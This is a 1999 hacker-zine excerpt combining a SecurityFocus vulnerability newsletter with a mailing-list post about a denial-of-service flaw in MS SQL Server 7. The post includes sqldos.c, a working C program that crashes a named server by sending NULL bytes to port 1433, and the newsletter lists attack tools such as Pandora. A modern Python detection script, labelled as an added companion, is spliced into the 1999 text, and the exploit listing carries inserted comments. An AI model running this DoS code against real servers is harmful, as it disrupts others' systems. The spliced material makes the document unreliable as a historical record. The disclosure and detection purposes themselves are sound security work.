Welcome to the Security Focus 'week in review' newsletter issue 17
sponsored by CORE SDI.
http://www.core-sdi.com
II. BUGTRAQ SUMMARY 1999-11-21 to 1999-11-27
---------------------------------------------
1. NetTerm FTP Server Multiple Vulnerabilities
BugTraq ID: 819
Remote: Yes
Date Published: 1999-11-22
Relevant URL:
http://www.securityfocus.com/bid/819
Summary:
InterSoft's internet suite includes an FTP server which has been found to
have numerous vulnerabilities. Among them:
The default configuration allows read/write access to the root of the C:
drive for anonymous users. This write access includes overwrite and
delete. If the server is setup with 'out of the box' options, anonymous
remote users have full access to the operating system files and
executables.
There is no administrator account, which means that any user with console
access can alter the server's settings.
The encryption method used on the passwords for user accounts is reported
to be weak and easily broken.
There are also multiple buffer overflows. Supplying over 1024-character
arguments to the following commands will crash the server: dir, ls, mkdir,
delete, and rmdir. Also, although the PASS buffer is truncated at 16
characters for users with accounts, this limit is not in place for the
anonymous user (to allow for proper entry of email addresses as passwords)
and a 1024-byte string 'password' will crash the server if user name
'anonymous' is supplied. It may be possible to exploit these overflows to
run arbitrary code.
2. Microsoft IE5 XML HTTP Redirect Vulnerability
BugTraq ID: 815
Remote: Yes
Date Published: 1999-11-22
Relevant URL:
http://www.securityfocus.com/bid/815
Summary:
A vulnerability in the method IE5 uses to process XML data may allow a
malicious web site owner to read files on a visiting user's computer. A
web page may be created that contains an XML object type that contains
instructions to read known files on a visitor's local host (and or
domain). The IE5 client will allow the XML redirect to access files within
its own domain.
3. Sun Java IDE Webserver IP Restriction Failure Vulnerability
BugTraq ID: 816
Remote: Yes
Date Published: 1999-11-23
Relevant URL:
http://www.securityfocus.com/bid/816
Summary:
These Java development applications include an http server for testing
purposes. The server can be configured to only respond to requests from
certain IP addresses, however the mechanism fails and any requests
received are serviced. The server will allow read access to any file on
the filesystem that it has access to, all the way up to the root
directory. In the Netbeans product, this is the default 'out of the box'
configuration. In the Forte product, IP addresses must be added manually
to a list of permitted clients. Once a single IP address is added, any
requests regardless of source are responded to.
4. Vermillion FTPd CWD DoS Vulnerability
BugTraq ID: 818
Remote: Yes
Date Published: 1999-11-22
Relevant URL:
http://www.securityfocus.com/bid/818
Summary:
If the Vermillion FTP Daemon (VFTPD) receives three consecutive CWD
commands with arguments of 504 characters or longer, it will crash.
5. Mdaemon WebConfig Overflow DoS Vulnerability
BugTraq ID: 820
Remote: Unknown
Date Published: 1999-11-24
Relevant URL:
http://www.securityfocus.com/bid/820
Summary:
The Mdaemon mail server for Windows includes a small web server for
web-based remote administration. This webserver is vulnerable due to an
unchecked buffer that handles incoming GET requests. An abnormally large
URL sent to the WebConfig service at port 2002 will crash the service.
6. Cabletron SSR ARP Flood DoS Vulnerability
BugTraq ID: 821
Remote: Yes
Date Published: 1999-11-24
Relevant URL:
http://www.securityfocus.com/bid/821
Summary:
The Cabletron SmartSwitch Router 8000 with firmware revision 2.x has been
shown to be susceptible to a denial of service attack. The SSR can only
handle approximately 200 ARP requests per second. If an attacker can get
ICMP traffic to the router, they can flood it with ARP requests,
effectively shutting the router down for the duration of the attack.
7. Netscape Navigator Long ASP Argument Vulnerability
BugTraq ID: 822
Remote: Yes
Date Published: 1999-11-26
Relevant URL:
http://www.securityfocus.com/bid/822
Summary:
Netscape Communicator 4.7 has been shown to crash when an argument of 800
characters is supplied to a command in an asp page. Some of the data
passed as the argument makes it into the EIP and EBP registers, so
execution of arbitrary code is a possibility. The overflow could be
embedded in a link on a webpage or in an email message for remote attacks.
8. Deerfield WorldClient Long URL DoS Vulnerability
BugTraq ID: 823
Remote: Yes
Date Published: 1999-11-26
Relevant URL:
http://www.securityfocus.com/bid/823
Summary:
Deerfield's WorldClient is an email webserver that allows its users to
retrieve email via HTTP. It is susceptible to denial of service attacks
due to an unchecked buffer in the request handler. Supplying a long url
will crash the server.
9. SCO Xsco Buffer Overflow Vulnerability
BugTraq ID: 824
Remote: No
Date Published: 1999-11-25
Relevant URL:
http://www.securityfocus.com/bid/824
Summary:
Under certain versions of Unixware, the SUID program Xsco is vulnerable to
a buffer overflow attack. The problem lies in that Xsco does not sanity
check user supplied data.
10. SCO xlock(1) (long username) Buffer Overflow Vulnerability
BugTraq ID: 825
Remote: No
Date Published: 1999-11-25
Relevant URL:
http://www.securityfocus.com/bid/825
Summary:
Certain versions of Unixware ship with a version of xlock which is
vulnerable to a buffer overflow attack. The xlock(1) program locks the
local X display until a username and password are entered. In this
instance a user can provide an overly long username and overflow a buffer
in xlock(1). Given that xlock(1) runs SUID root this will result in a root
compromise.
11. SCO su(1) Buffer Overflow Vulnerability
BugTraq ID: 826
Remote: No
Date Published: 1999-11-25
Relevant URL:
http://www.securityfocus.com/bid/826
Summary:
Certain versions of Unixware ship with a version of su(1) which is
vulnerable to a buffer overflow attack. This attack is possible because
su(1) fails to sanity check user supplied data, in this instance a
username supplied on the command line. Because su(1) is SUID root this
attack may result in root privileges.
III. PATCH UPDATES 1999-11-21 to 1999-11-27
-------------------------------------------
1. Vendor: Red Hat
Product: RedHat Linux
Patch Location:
Red Hat Linux 4.x:
Intel:
ftp://updates.redhat.com/4.2/i386/sysklogd-1.3.31-0.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-debug-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-devel-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-profile-5.3.12-18.5.i386.rpm
ftp://updates.redhat.com/4.2/i386/libc-static-5.3.12-18.5.i386.rpm
Alpha:
ftp://updates.redhat.com/4.2/alpha/sysklogd-1.3.31-0.5.alpha.rpm
Sparc:
ftp://updates.redhat.com/4.2/sparc/sysklogd-1.3.31-0.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-debug-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-devel-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-profile-5.3.12-18.5.sparc.rpm
ftp://updates.redhat.com/4.2/sparc/libc-static-5.3.12-18.5.sparc.rpm
Source packages:
ftp://updates.redhat.com/4.2/SRPMS/sysklogd-1.3.31-0.5.src.rpm
ftp://updates.redhat.com/4.2/SRPMS/libc-5.3.12-18.5.src.rpm
Red Hat Linux 5.x:
Intel:
ftp://updates.redhat.com/5.2/i386/sysklogd-1.3.31-1.5.i386.rpm
Alpha:
ftp://updates.redhat.com/5.2/alpha/sysklogd-1.3.31-1.5.alpha.rpm
Sparc:
ftp://updates.redhat.com/5.2/sparc/sysklogd-1.3.31-1.5.sparc.rpm
Source packages:
ftp://updates.redhat.com/5.2/SRPMS/sysklogd-1.3.31-1.5.src.rpm
Red Hat Linux 6.0:
Intel:
ftp://updates.redhat.com/6.0/i386/sysklogd-1.3.31-14.i386.rpm
Alpha:
ftp://updates.redhat.com/6.0/alpha/sysklogd-1.3.31-14.alpha.rpm
Sparc:
ftp://updates.redhat.com/6.0/sparc/sysklogd-1.3.31-14.sparc.rpm
Source packages:
ftp://updates.redhat.com/6.0/SRPMS/sysklogd-1.3.31-14.src.rpm
Red Hat Linux 6.1:
Intel:
ftp://updates.redhat.com/6.1/i386/sysklogd-1.3.31-14.i386.rpm
Source packages:
ftp://updates.redhat.com/6.1/SRPMS/sysklogd-1.3.31-14.src.rpm
The following patches are for Cobalt Networks RAQ and Qube servers which run RedHat Linux:
RPMS:
-RaQ3-
ftp://ftp.cobaltnet.com/pub/experimental/security/i386/sysklogd-1.3.33-9C1.i386.rpm
-RaQ1 RaQ2 Qube1 Qube2-
ftp://ftp.cobaltnet.com/pub/experimental/security/mips/sysklogd-1.3.33-9C2.mips.rpm
SRPMS:
ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C1.src.rpm
ftp://ftp.cobaltnet.com/pub/experimental/security/srpms/sysklogd-1.3.33-9C2.src.rpm
Vulnerability Patched: Linux syslogd Denial of Service Vulnerability
BugTraq ID: 809
Relevant URLS:
http://www.securityfocus.com/bid/809
2. Vendor: Sun Microsystems
Product: Solaris 7
Patch Location:
http://sunsolve.sun.com/pub-cgi/show.pl?target=patches/patch-license&nav=pub-patches
Vulnerability Patched: Solaris rpc.ttdbserver Denial of Service Vulnerability
BugTraq ID: 811
Relevant URLS:
http://www.securityfocus.com/bid/811
3. Vendor: Cabletron
Product: Cabletron SmartSwitch Router 8000 firmware 2.x
Patch Location:
http://www.cabletron.com/download/download.cgi?lib=ssr
Vulnerability Patched: Cabletron SSR ARP Flood DoS Vulnerability
BugTraq ID: 821
Relevant URLS:
http://www.securityfocus.com/bid/821
4. Vendor: SCO
Product: Unixware
Patch Location:
Anonymous ftp (World Wide Web URL):
ftp://ftp.sco.COM/SSE/sse039.ltr (cover letter, ASCII text)
ftp://ftp.sco.COM/SSE/sse039.tar.Z (new binaries, compressed tar file)
Compuserve:
GO SCOFORUM, and search Library 11 (SLS/SSE Files) for these
filenames:
SSE039.LTR (cover letter, ASCII text)
SSE039.TAZ (new binaries, compressed tar file)
Vulnerability Patched: SCO su(1) Buffer Overflow Vulnerability
BugTraq ID: 826
Relevant URLS:
http://www.sco.com/support/ftplists/index.html
http://www.securityfocus.com/bid/
5. Vendor: Caldera
Product: Caldera OpenLinux (and its other distributions)
Patch Location:
ftp://ftp.calderasystems.com/pub/OpenLinux/updates/2.3/current/RPMS/
Vulnerability Patched: Pine Environment Variable Expansion in URLS Vulnerability
BugTraq ID: 810
Relevant URLS:
http://www.securityfocus.com/bid/810
INCIDENTS SUMMARY 1999-11-21 to 1999-11-27
------------------------------------------
1. Re: Port 137 and snmp scans (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.10.9911220749020.615-100000@epr0.org
2. SunOS rpcbind scans (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=XFMail.991122220828.ldavis@fastq.com
3. Re: cracker probing 1542 (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122172139.12644.qmail@securityfocus.com
4. Re: rpc logging (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991122224453.1743.qmail@securityfocus.com
5. SANS and CERT ICMP advisories (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991123051240.12076.qmail@securityfocus.com
6. Fw: unsolicited connection(s) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=01aa01bf3599$17618a40$30a238cd@bbn.com
7. F5's 3DNS signature + Cisco Distrib Dir (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991124021152.13054.qmail@securityfocus.com
8. Insane amount of probes from 216.212.in-addr.arpa (tin.it) (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.LNX.4.05.9911250211030.30972-100000@bean.xtdnet.nl
9. BIND Scanning (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=Pine.SOL.4.10.9911251135010.20417-100000@yuma.Princeton.EDU
10. sweep (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991125164633.23732.qmail@securityfocus.com
11. pop3/imap crawler.. (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=19991126132342.G28629@obfuscation.org
12. UK Law & Cases Re Malicious action/attacks (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=004f01bf3810$414d9960$050010ac@xtranet.co.uk
13. cgi attack
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=383F9790.150177EB@eti.cc.hun.edu.tr
14. Re: problems from ip69.net247221.cr.sk.ca[24.72.21.69] (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=3841bb7e.1d7.0@infolink.com.br
15. Port 98 scans & new 3128/8080 scans
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=75&date=1999-11-22&msg=14401.22457.121945.823373@cap-ferrat.albourne.com
V. VULN-DEV RESEARCH LIST SUMMARY 1999-11-21 to 1999-11-27
----------------------------------------------------------
1. Re: icq accounts (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122182152.P26100@willamette.edu
2. Re: WordPad/riched20.dll buffer overflow (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=18692.991122@iname.com
3. SSH exploit (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=383C072F.408BE3FC@core-sdi.com
4. lanma256.bmp/lanmannt.bmp security risk? (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=3EE01C3AD21BD211B73C0008C72833F9582BA0@exchange.ls.se
5. Re: development of wordpad exploit (Thread)
Relevant URL:
http://www.securityfocus.com/templates/archive.pike?list=82&date=1999-11-22&msg=19991122121349.4947.qmail@home1.gmx.net
VI. SECURITY JOBS SUMMARY 1999-11-21 to 1999-11-27
---------------------------------------------------
1. SecurityFocus.com is looking for staff writers for a Windows NT column!
Reply to: Alfred Huger <ah@securityfocus.com>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=Pine.GSO.4.10.9911231458200.4263-100000@www.securityfocus.com
2. NYC - Internet Security Position
Reply to: timoe@interworld.com
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124200337.15430.qmail@securityfocus.com
3. Security Research Engineer
Reply to: Samuel Cure <scure@iss.net>
Position Requirements:
http://www.securityfocus.com/templates/archive.pike?list=77&date=1999-11-22&msg=19991124201148.15891.qmail@securityfocus.com
VII. SECURITY SURVEY 1999-11-15 to 1999-11-27
----------------------------------------------
The question for 1999-11-15 to 1999-11-27 was:
Which Security conference do you think is more useful to attendees? (Bang
for your buck)
SANS 31% / 30 votes
BlackHat 15% / 15 votes
TISC 4% / 4 votes
CSI 5% / 5 votes
Chaos Communications Congress 6% / 6 votes
Defcon 30% / 29 votes
Total number of votes: 94 votes
VIII. SECURITY FOCUS TOP 6 TOOLS 1999-11-21 to 1999-11-27
--------------------------------------------------------
1. SecurityFocus.com Pager
by SecurityFocus.com
URL: http://www.securityfocus.com/pager/sf_pgr20.zip
Platforms: Win95/98/NT
Number of downloads: 1690
This program allows the user to monitor additions to the Security Focus
website without constantly maintaining an open browser. Sitting quietly in
the background, it polls the website at a user-specified interval and
alerts the user via a blinking icon in the system tray, a popup message or
both (also user-configurable).
2. Lookout
by Dragonmount Networks
URL: http://www.dragonmount.net/software/lookout/
Platforms: Windows 2000, Windows 95/98 and Windows NT
Number of downloads: 1222
Lookout provides raw access to data sent over a TCP connection, allowing
the inspection of protocols and the testing of buffers. Lookout connects
to a foreign host's port and allows you to communicate with the host.
Alternatively, Lookout can listen on a port and wait for another host to
connect. Lookout can send variable length strings to test buffers easily.
3. cgicheck99 0.4
by deepquest
URL: http://www.deepquest.pf/
Platforms: BSDI, BeOS, DOS, FreeBSD, HP-UX, IRIX, Linux, MacOS, NetBSD,
OS/2, OpenBSD, OpenVMS, PalmOS, Solaris, SunOS, UNIX, Windows 2000,
Windows 3.x, Windows 95/98, Windows CE and Windows NT
Number of downloads: 1079
This is one of the world's most cross-platform cgi scanners, running on 37
operating systems! Even PalmOS soon! It will check for 119 common cgi and
other remote issues, and it will report the Bugtraq ID of some
vulnerabilities. Get the rebol interpreter at http://www.rebol.com.
4. HookProtect
by ANNA Ltd., pcihprot@anna.zaporizhzhe.ua
URL: http://www.geocities.com/SiliconValley/Hills/8839/index.html
Platforms: Windows 95/98 and Windows NT
Number of downloads: 777
HookProtect version 2.05 is another powerful product of the PCinvestigator
series. It specializes in detecting programs that infringe on privacy and
confidentiality on personal computers. There are many types of such
programs: keyloggers, interceptors, spies, Trojans and so on. Their main
function is monitoring some kind of user activity on a computer (for
example, typing text, running applications, opening windows, Internet
activity, etc.).
5. Pandora for Linux v4 beta 2
by Nomad Mobile Research Centre
URL: http://www.nmrc.org/pandora
Platforms: Linux
Number of downloads: 693
BETA - Online point and click auditing of Novell Netware from Windows NT.
Currently spoofing works but lots of crashes on SP3 (we're working on it).
Attach to server with password hashes extracted from Offline program.
Search for target servers. Attach to a server and grab user accounts
without logging in. Dictionary attack against user account. Multiple
Denial of Service attacks. Improved spoofing and hijacking by using
realtime sniffing. Works against Netware 4 and 5.
6. Sun Enterprise Network Security Service Early Access 1
by Sun Microsystems
URL: http://www.sun.com/software/communitysource/senss/
Platforms: Java
Number of downloads: 637
Sun Enterprise Network Security Service (SENSS) is a flexible, Java-based
security solution: a tool that enables organizations to audit and secure
their systems and networks in a modern, heterogeneous, corporate intranet.
The SENSS software is not yet complete; this is the Early Access 1
release, made available for the benefit of parties with a professional
interest in network security, for their experimentation and comment.
The source code is licensed under the Sun Community Source-Code License,
consistent with the Sun Community Source License principles.
IX. SPONSOR INFORMATION -
------------------------------------------
URL: http://www.core-sdi.com
CORE SDI is an international computer security research and development
company. Its clients include 3 of the Big 5 chartered accountant firms,
for whom CORE SDI develops customized security auditing tools, as well as
several notable computer security product vendors, such as Network
Associates. CORE SDI also has extensive experience dealing with financial
and government contracts throughout Latin and North America.
X. SUBSCRIBE/UNSUBSCRIBE INFORMATION
-------------------------------------
1. How do I subscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM with a message body
of:
SUBSCRIBE SF-NEWS Lastname, Firstname
You will receive a confirmation request message to which you will have
to answer.
2. How do I unsubscribe?
Send an e-mail message to LISTSERV@SECURITYFOCUS.COM from the subscribed
address with a message body of:
UNSUBSCRIBE SF-NEWS
If your email address has changed email aleph1@securityfocus.com and I
will manually remove you.
3. How do I disable mail delivery temporarily?
If you are simply going on vacation you can turn off mail delivery
without unsubscribing by sending LISTSERV the command:
SET SF-NEWS NOMAIL
To turn back on e-mail delivery use the command:
SET SF-NEWS MAIL
4. Is the list available in a digest format?
Yes. The digest is generated once a day.
5. How do I subscribe to the digest?
To subscribe to the digest join the list normally (see section 0.2.1)
and then send a message to LISTSERV@SECURITYFOCUS.COM with a message
body of:
SET SF-NEWS DIGEST
6. How do I unsubscribe from the digest?
To turn the digest off send a message to LISTSERV with a message body
of:
SET SF-NEWS NODIGEST
If you want to unsubscribe from the list completely follow the
instructions of section 0.2.2 next.
7. I seem to not be able to unsubscribe. What is going on?
You are probably subscribed from a different address than the one from
which you are sending commands to LISTSERV. Either send email from
the appropriate address or email the moderator to be unsubscribed manually.
Alfred Huger
VP of Engineering
SecurityFocus.com
@HWA
28.0 SQL 7 "Magic Packet" DoS
~~~~~~~~~~~~~~~~~~~~~~~~
From NTSecurity list
Kevork Belian discovered this on Dec. 1. I have been working with his code
trying to replicate the results but have yet to be successful. This does not
mean that Kevork's findings are incorrect, it just means that I need to do
more testing.
I don't believe in holding information back from the mailing list so here
are the complete details as received from Kevork. Including his code.
This was tested on SQL 7.00.699
MS SQL Server TCP/IP net library must be enabled. Sending more than 3 NULL
bytes in the TCP data can crash the SQL Server. MS SQL listens on TCP port
1433. If this attack is successful you will see an event 17055 in your log
and you will have to reboot to restore service.
It has been suggested that a solution would be to block incoming traffic on
port 1433 or disable the TCP/IP net library. Of course this could have an
impact on the functionality of the product. It would be preferable to have
a MS hotfix for this issue. Microsoft has been notified and are working on
the situation themselves.
It is unknown at this time if this attack is actually being carried out.
============ original text from Kevork Belian========
Description:
MS SQL Server 7.0 silently crashes when sent a TCP packet containing more
than 2 NULLs as data.
I tested this on machines running SQL Server version 7.00.699 (SP 1). The NT
box is running NT Server with SP 4 (I don't think the Service Pack is an
issue since NT is not affected).
If the TCP/IP net library is enabled, the 3 or greater NULL bytes crash SQL
Server listening on port 1433. The SQL server raises an event 17055 with
fatal exception EXCEPTION_ACCESS VIOLATION.
I have noticed that you might experience a situation when the SQL Server
won't crash at first; keep resending the packet until it crashes
(hopefully).
It puzzles me why other people weren't able to reproduce it. Is it a
misconfiguration issue? (I seriously doubt it.)
thanks
Kevork Belian
========end text=========
====begin script from Kevork Belian=====
/*
** sqldos.c -- a DoS attack against MS SQL Server
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include <strings.h>     /* bzero() */
#include <unistd.h>      /* close() */
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 1433 /* the port SQL Server listens on */

int main(int argc, char *argv[])
{
    int sockfd, numbytes;
    struct hostent *he;
    char buff[65535];
    struct sockaddr_in target_addr;

    if (argc != 2) {
        fprintf(stderr, "Usage: sqldos target\n");
        exit(1);
    }
    /* resolve the target name; the opening brace was missing here in the
       original listing */
    if ((he = gethostbyname(argv[1])) == NULL) {
        perror("gethostbyname");
        exit(1);
    }
    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1) {
        perror("socket error");
        exit(1);
    }
    target_addr.sin_family = AF_INET;
    target_addr.sin_port = htons(PORT);
    target_addr.sin_addr = *((struct in_addr *)he->h_addr);
    bzero(&(target_addr.sin_zero), 8);
    if (connect(sockfd, (struct sockaddr *)&target_addr,
                sizeof(struct sockaddr)) == -1) {
        perror("connect error");
        exit(1);
    }
    /* only the first 3 bytes of the 14-byte payload are explicitly zeroed;
       the remaining 11 are whatever buff already held */
    memset(buff, 0, 3);
    if ((numbytes = send(sockfd, buff, 14, 0)) == -1) {
        perror("send error");
        exit(1);
    }
    close(sockfd);
    return 0;
}
=======end script=========
Of course credit has to go to Kevork Belian as he made the discovery. I
would be interested to hear if anyone else can replicate this.
Regards;
Steve Manzuik
Moderator
Win2K Security Advice
_____________________________________________________________________
** TO UNSUBSCRIBE, send the command "UNSUBSCRIBE win2ksecadvice"
** FOR A WEEKLY DIGEST, send the command "SET win2ksecadvice DIGEST"
SEND ALL COMMANDS TO: listserv@listserv.ntsecurity.net
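A defender-side companion to the post above, added here as an example; it is not part of the original list post and not Kevork Belian's code. It does two things the post gives a defender to work with: it flags TCP payloads to port 1433 that begin with a NULL byte and carry three or more NULLs in total (the trigger the post describes), and it scans event-log lines for event 17055 from the MSSQLServer source (the symptom the post names). The packet records, the log lines and the log line layout are all constructed for this example, so the regex is written for that invented layout and needs adjusting to whatever your event-log exporter produces. The one protocol fact it relies on is that every TDS packet starts with a non-zero packet-type byte; counting NULLs alone would be far too noisy, since a TDS 7.0 login packet carries UCS-2 strings and is full of them.

```python
"""
Defender-side checks for the SQL Server 7.0 "magic packet" crash described
in the post above. Added example; not the original post's or Kevork Belian's
code. Packet records, log lines and the log line layout are constructed.
"""
import re
from dataclasses import dataclass

SQL_PORT = 1433           # the port the post says SQL Server listens on
NULL_THRESHOLD = 3        # the post's trigger: "3 or greater NULL bytes"
CRASH_EVENT_ID = 17055    # the event the post says follows a successful crash


@dataclass(frozen=True)
class TcpSegment:
    """One captured TCP segment: source address, destination port, payload."""
    src: str
    dst_port: int
    payload: bytes


def is_null_probe(seg: TcpSegment, threshold: int = NULL_THRESHOLD) -> bool:
    """Flag a segment to the SQL port whose payload starts with a NULL byte
    and carries at least `threshold` NULL bytes in total.

    A TDS packet always begins with a non-zero packet-type byte, so a payload
    whose first byte is 0x00 is not a client speaking TDS at all. That first
    byte, not the NULL count, is what separates the probe from a legitimate
    TDS 7.0 login packet (which is full of NULLs from its UCS-2 strings).
    """
    if seg.dst_port != SQL_PORT or not seg.payload:
        return False
    return seg.payload[0] == 0 and seg.payload.count(0) >= threshold


def flagged_sources(segments) -> list:
    """Source addresses of every segment that looks like the NULL probe."""
    return [s.src for s in segments if is_null_probe(s)]


# Constructed log line layout: "<timestamp> Source: <name> Event ID: <n> <text>"
EVENT_RE = re.compile(r"Source:\s*(?P<source>.+?)\s+Event ID:\s*(?P<id>\d+)")


def find_crash_events(lines, event_id: int = CRASH_EVENT_ID) -> list:
    """(line_number, line) for each MSSQLServer line carrying `event_id`."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = EVENT_RE.search(line)
        if m and m.group("source") == "MSSQLServer" and int(m.group("id")) == event_id:
            hits.append((n, line.strip()))
    return hits


# Constructed sample traffic; payloads are illustrative shapes, not captures.
SEGMENTS = [
    # pre-login style TDS packet: type byte 0x12, contains NULLs but starts non-zero
    TcpSegment("10.0.0.5", SQL_PORT, b"\x12\x01\x00\x2f\x00\x00\x01\x00"),
    # the 14-byte shape sqldos.c sends: three leading NULLs, the rest arbitrary
    TcpSegment("10.0.0.7", SQL_PORT, b"\x00\x00\x00" + b"\x41" * 11),
    # all-NULL payload, but not to the SQL port
    TcpSegment("10.0.0.9", 80, b"\x00" * 14),
    # TDS7 login style packet: type byte 0x10, many NULLs from UCS-2 strings
    TcpSegment("10.0.0.8", SQL_PORT, b"\x10\x01" + b"\x00" * 20),
    # only two NULLs: below the threshold the post describes
    TcpSegment("10.0.0.6", SQL_PORT, b"\x00\x00\x41"),
]

# Constructed log lines in the invented layout above.
LOG_LINES = [
    "1999-12-01 10:02:10 Source: Service Control Manager Event ID: 7036 MSSQLServer entered the running state",
    "1999-12-01 10:02:13 Source: MSSQLServer Event ID: 17055 Fatal exception EXCEPTION_ACCESS_VIOLATION",
    "1999-12-01 10:02:14 Source: Browser Event ID: 8033 The browser has forced an election",
]


def main():
    print("NULL probes to port %d from:" % SQL_PORT, flagged_sources(SEGMENTS))
    for n, line in find_crash_events(LOG_LINES):
        print("log line %d: %s" % (n, line))


if __name__ == "__main__":
    main()
```

The port check and the first-byte check together keep the signature narrow; if you run this against a real capture, the thing to tune is the threshold, not the first-byte rule. The post's own mitigations (filter port 1433 at the perimeter, or disable the TCP/IP net library) remain the actual fix until a vendor hotfix is available; this only tells you whether someone is trying.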
@HWA
-=----------=- -=----------=- -=----------=- -=----------=-
0
0
0
o
O O O
0
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
=----------=- -=----------=- -=----------=- -=----------=- -=----------=-
AD.S ADVERTI$ING. The HWA black market ADVERTISEMENT$.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
_ _ _ _
/\ | | | | (_) (_)
/ \ __| |_ _____ _ __| |_ _ ___ _ _ __ __ _
/ /\ \ / _` \ \ / / _ \ '__| __| / __| | '_ \ / _` |
/ ____ \ (_| |\ V / __/ | | |_| \__ \ | | | | (_| |
/_/ \_\__,_| \_/ \___|_| \__|_|___/_|_| |_|\__, |
__/ |
|___/
ADVERTISING IS FREE, SEND IN YOUR ADS TO CRUCIPHUX@DOK.ORG FOR INCLUSION HERE
*****************************************************************************
* *
* ATTRITION.ORG http://www.attrition.org *
* ATTRITION.ORG Advisory Archive, Hacked Page Mirror *
* ATTRITION.ORG DoS Database, Crypto Archive *
* ATTRITION.ORG Sarcasm, Rudeness, and More. *
* *
*****************************************************************************
When people ask you "Who is Kevin Mitnick?" do you have an answer?
www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.freekevi
n.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnick.co
m www.2600.com ########################################ww.2600.com www.freeke
vin.com www.kev# Support 2600.com and the Free Kevin #.com www.kevinmitnick.
com www.2600.co# defense fund site, visit it now! . # www.2600.com www.free
kevin.com www.k# FREE EVIN! #in.com www.kevinmitnic
k.com www.2600.########################################om www.2600.com www.fre
ekevin.com www.kevinmitnick.com www.2600.com www.freekevin.com www.kevinmitnic
k.com www.2600.com www.freekevin.com www.kevinmitnick.com www.2600.com www.fre
http://www.2600.com/ http://www.kevinmitnick.com
+-----------------------------------------------------------------------------+
| SmoG Alert .. http://smog.cjb.net/ NEWS on SCIENCE |
| =================== http://smog.cjb.net/ NEWS on SECURITY |
| NEWS/NEWS/NEWS/NEWS http://smog.cjb.net/ NEWS on THE NET |
| http://smog.cjb.net/ NEWS on TECHNOLOGY |
+-----------------------------------------------------------------------------+
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* www.csoft.net webhosting, shell, unlimited hits bandwidth ... www.csoft.net *
* www.csoft.net www.csoft.net www.csoft.net www.csoft.net www.csoft.net *
* http://www.csoft.net One of our sponsers, visit them now www.csoft.net *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.BIZTECHTV.COM/PARSE WEDNESDAYS AT 4:30PM EST, HACK/PHREAK CALL-IN WEBTV *
* JOIN #PARSE FOR LIVE PARTICIPATION IN SHOW CHAT OR THE WEBCHAT, AND WEBBOARD*
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
* WWW.2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
* * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
//////////////////////////////////////////////////////////////////////////////
// To place an ad in this section simply type it up and email it to //
// hwa@press,usmc.net, put AD! in the subject header please. - Ed //
// or cruciphux@dok.org //
//////////////////////////////////////////////////////////////////////////////
@HWA
HA.HA Humour and puzzles ...etc
~~~~~~~~~~~~~~~~~~~~~~~~~
Don't worry. worry a *lot*
Send in submissions for this section please! ............c'mon, you KNOW you
